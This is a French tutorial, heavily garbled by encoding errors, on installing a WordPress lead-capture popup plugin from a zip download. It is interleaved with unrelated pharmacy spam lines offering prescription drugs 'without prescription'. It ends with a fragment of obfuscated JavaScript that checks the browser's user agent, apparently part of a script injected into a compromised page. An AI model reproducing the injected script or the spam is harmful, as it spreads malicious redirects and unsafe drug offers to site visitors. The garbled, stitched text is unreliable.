La faAi??on la plus simple est d’utiliser le plugin « Iframe Apps » et configurer la Popup.
L’application se charge de tout et connecte automatiquement les nouveaux leads.

Cai??i??est une fenA?tre avec un formulaire destinAi?? Ai?? gAi??nAi??rer une inscription (sous forme de popup), qui sai??i??ouvre sur la page dai??i??accueil ou toute autre page de votre blog WordPress Ai?? un moment choisi. Par exemple, vous dAi??cidez de quitter le blog que vous A?tes en train de visiter et une fenA?tre apparaAi??t pour vous proposer :

• de vous inscrire Ai?? la newsletter,
  • de tAi??lAi??charger un cadeau avant de partir,
  • de suivre le blog sur un rAi??seau socialai??i??

free zoloft with out perscription. pop-up

La popup, un outil trA?s efficace pour gAi??nAi??rer des leads.
Titre,
Phrase d’accroche,
Champ pour ajouter un email.

Comment installer une pop up?

Le fichier est disponible Ai?? cette l’adresse :Ai??facebook.iframe-apps.com/automatic_nl/autonl.zip.

• Installez votre plugin sur WordPress.

Allez sur votre admin WordPress, section « extension », « ajouter » et importez le fichier ici.

extension-ajouter-1
lady-era pills

• Connectez votre page Facebook

Allez sur l’administration et connectez votre page Facebook liAi??e Ai?? votre activitAi??.

conection-fb

• Configurez la pop up.

infertility drugs without prescription.
Vous pouvez choisir un thA?me parmi des designs prAi??rAi??glAi??s ou alors crAi??er, et configurer le vA?tre.

theme

Regardez le rAi??sultat et commencez Ai?? gAi??nAi??rer des leads! fdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}